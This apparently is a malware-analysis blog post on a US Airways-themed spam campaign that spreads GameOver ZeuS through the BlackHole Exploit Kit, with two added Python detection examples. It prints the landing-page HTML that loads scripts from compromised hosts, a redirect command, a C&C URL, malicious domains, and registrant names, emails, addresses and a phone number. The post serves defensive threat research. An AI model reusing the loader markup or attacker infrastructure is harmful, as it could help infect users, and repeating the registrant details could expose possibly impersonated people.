A gift from ZeuS for passengers of US Airways

Spam

On 20 March, we detected a spam campaign targeting passengers of US Airways. For almost the entire week, cybercriminals were sending users the following email, allegedly from US Airways:

There is a brief description of the check-in procedure and a confirmation code is provided for online reservation.

The criminals are obviously banking on recipients who happen to be flying on the flight mentioned in the email clicking on the "Online reservation details" link.

Different emails contained different links — for example, we noticed the following domains: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.

After clicking the link a series of redirects eventually leads to a domain hosting BlackHole Exploit Kit.

BlackHole Exploit Kit: redirections and infection

A typical BlackHole infection routine is used to infect users’ computers.
The first port of call after clicking the link in the email is a page with the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>

As a result, JavaScript files from several different domains are loaded into the user's browser. Each script contains a single command such as document.location='http://indigocellular.com/', which redirects the user to a page containing another, obfuscated, JavaScript.
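As an added example (not code from the original post), the following Python script checks a captured landing page and the bodies of the scripts it pulls in for the pattern described above: a near-empty page loading js.js from several unrelated hosts, each script being nothing but a document.location redirect. The sample HTML and script bodies are constructed here, with the removed path segment replaced by a REMOVED placeholder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the landing page shown above (path segment removed).
LANDING_HTML = """<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/REMOVED/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/REMOVED/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/REMOVED/js.js"></script>
</html>"""

# Constructed bodies of the fetched scripts; the real ones held one redirect command.
SCRIPT_BODIES = {
    "http://boemelparty.be/REMOVED/js.js": "document.location='http://indigocellular.com/'",
    "http://sas.hg.pl/REMOVED/js.js": 'document.location = "http://browncellular.com/";',
    "http://www.alpine-turkey.com/REMOVED/js.js": "var x = 1; // no redirect here",
}

# Matches document.location / window.location(.href) = '<url>' assignments.
REDIRECT_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


class ScriptSrcParser(HTMLParser):
    """Collects the src attribute of every <script> tag in the page."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def external_script_domains(html):
    """Distinct hosts the page loads scripts from, sorted."""
    parser = ScriptSrcParser()
    parser.feed(html)
    return sorted({urlparse(s).netloc for s in parser.srcs})


def redirect_targets(script_bodies):
    """Map script URL -> redirect target for scripts that are pure redirectors."""
    return {url: m.group(1) for url, body in script_bodies.items()
            if (m := REDIRECT_RE.search(body))}


def looks_like_blackhole_landing(html, script_bodies, min_domains=3):
    """Heuristic: scripts from many unrelated hosts plus at least one redirector."""
    return (len(external_script_domains(html)) >= min_domains
            and bool(redirect_targets(script_bodies)))
```

The redirect targets collected this way are the next hop of the chain and are what an analyst would feed into blocklists or further crawling.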

This script's job is to insert into the page's HTML links that lead to the object carrying the exploit. So far, we've detected three types of objects: a JAR file, an SWF file and a PDF document. Each object exploits a vulnerability in the corresponding application (Java, Flash Player or Adobe Reader) to execute malicious code on the targeted system. If a vulnerable version of even one of those applications is in use, the attack ends in infection: the malicious executable is downloaded and run on the user's system.

Malicious JAR, SWF and PDF documents are loaded from different domains, e.g. indigocellular.com, browncellular.com, bronzecellular.com (domain details are given at the end of this post), under the names Qai.jar, field.swf, dea86.pdf, 11591.pdf.

We detect these exploits as:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

After successfully exploiting vulnerabilities, an executable file is downloaded from the same domains where the exploits are located. It can be downloaded under different names — about.exe, contacts.exe and others — and is essentially a downloader. When the downloader runs, it connects to its C&C at the URL “176.28.18.135/pony/gate.php”, and downloads and runs another malicious program – ZeuS/ZBot or, to be more precise, a modification of one of the development branches of that Trojan known as ‘GameOver’ – on the user’s system.

ZeuS is downloaded from hacked sites such as:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Polymorphism

At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and ZeuS — was frequently replaced with a new one. The domains remained "alive" for nearly 12 hours, while the ZeuS samples were replaced more often.

During the short periods of time (a few hours over several days) that I was monitoring what files were being downloaded, I managed to detect 6 modifications of the downloader and 3 modifications of ZeuS.

To recap: a modification includes all the samples detected with the same verdict, so the number of detected programs is usually larger than the number of verdicts.

Downloader verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Total number of programs detected with these verdicts: 250.

ZeuS verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Total number of samples detected with these verdicts: 127.

As I have already mentioned, these were only the verdicts I managed to record. There were undoubtedly more modifications throughout the course of this particular spam campaign.

Botnet identifiers

It wasn't just the ZeuS wrapper (packer, anti-emulation) that was being changed; the malicious program itself was being recompiled. ZeuS contains a hardcoded botnet ID string and a set of IP addresses which the malicious program tries to connect to following infection. These data were modified over time as well. Judging by the numbers of detected and analyzed samples, we can assume that ZeuS was being recompiled at every second repacking.

Having analyzed 48 versions of the different modifications of ZeuS that were used by cybercriminals in this attack, I discovered 19 unique botnet identifiers:

chinz22 chinz24 blk25 mmz22 mmz24 mmz25
molotz25 NR22 NR23 NR24 NR25 ppcz22
ppcz23 ppcz24 rnato25 rubz22 rubz23 rubz24
zuu

In contrast to the conventional ZeuS program, which usually contains a single URL for downloading a configuration file, each GameOver sample has 20 hardcoded IP addresses with ports. Having infected the victim's computer, GameOver tries to establish a connection to those addresses in order to announce itself to the botnet, retrieve information (e.g. web injects) and send data stolen from the victim.

Of the 960 IP addresses contained in the 48 analyzed samples, just 157 are unique.


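As an added example, not part of the original post, the following Python code works with peer lists of the kind described above: per-sample lists of hardcoded ip:port pairs (20 per real sample) are deduplicated across samples, the peers recurring in the most samples are ranked, and outbound connection log lines are matched against the peer set. The peer lists, the log format and the addresses (documentation ranges) are all constructed for the example.

```python
import re
from collections import Counter

# Constructed per-sample peer lists (real GameOver samples carry 20 each; 4 here).
SAMPLE_PEERS = {
    "sample_A": ["192.0.2.10:25071", "192.0.2.11:22376",
                 "192.0.2.12:11807", "198.51.100.4:17051"],
    "sample_B": ["192.0.2.10:25071", "198.51.100.4:17051",
                 "198.51.100.5:23061", "192.0.2.12:11807"],
    "sample_C": ["192.0.2.11:22376", "198.51.100.6:18978",
                 "192.0.2.10:25071", "198.51.100.4:17051"],
}

# Constructed firewall-style log; the field layout is an assumption of this example.
CONN_LOG = """\
2012-03-21T10:01:02 src=10.0.0.5 dst=192.0.2.10:25071 proto=tcp action=allow
2012-03-21T10:01:03 src=10.0.0.5 dst=203.0.113.50:443 proto=tcp action=allow
2012-03-21T10:01:09 src=10.0.0.7 dst=198.51.100.4:17051 proto=tcp action=allow
2012-03-21T10:02:15 src=10.0.0.5 dst=192.0.2.10:80 proto=tcp action=allow
"""
LOG_RE = re.compile(r"src=(\S+)\s+dst=(\S+:\d+)")


def peer_stats(sample_peers):
    """Return (total entries, unique peers, Counter of samples each peer appears in)."""
    seen_in = Counter()
    total = 0
    for peers in sample_peers.values():
        total += len(peers)
        seen_in.update(set(peers))       # count a peer once per sample
    return total, sorted(seen_in), seen_in


def match_connections(log_text, peers):
    """Pairs (src, dst) for log lines whose destination ip:port is a known peer.
    Matching is on the exact ip:port; the same host on another port is not flagged."""
    known = set(peers)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m.group(2) in known:
            hits.append((m.group(1), m.group(2)))
    return hits
```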

Attack geography

I presume that during this time spam emails with links to confirm US Airways flight reservations were not the only method used to spread ZeuS. Cybercriminals are nothing if not original. And even though this is not the first time they've used a flight-related trick, it's the first time this particular kind of spam has been detected. If the recipients belong to the target audience, they are much more likely to click on a malicious link in an email. However, the majority of users who received these emails were not flying anywhere that day, which is why very few fell for the scam.

Obviously, over the period under review other spam emails were also being sent with links that led to the same sites, the same exploits and the same malicious executable files mentioned above. I took a look at where the threats related in one way or another to this attack were detected among our users. Below is a geographical breakdown of the detected exploits, downloaders and ZeuS modifications used by the cybercriminals in this attack:

Russia 32.8%
USA 10.3%
Italy 9.2%
Germany 8.6%
India 6.9%
France 3.8%
Ukraine 3.6%
Poland 3.2%
Brazil 3.1%
Malaysia 3%
Spain 2.9%
China 2.7%

P.S. Here's some information about the domains used in the spam campaign described above (it's not the first time these registration details have been used to register other domains that participate in propagating malicious software via spam):

indigocellular.com 209.59.218.102
Registrant: Nicholas Guzzardi, clarelam@primasia.com
5536 Gold Rush Dr.NW
87120 Albuquerque
United States
Tel: +1.5053505497
browncellular.com 174.140.168.207
Registrant: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US
bronzecellular.com 96.9.151.220
Registrant: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US

Below is an excerpt of the MD5 hashes of the files involved.


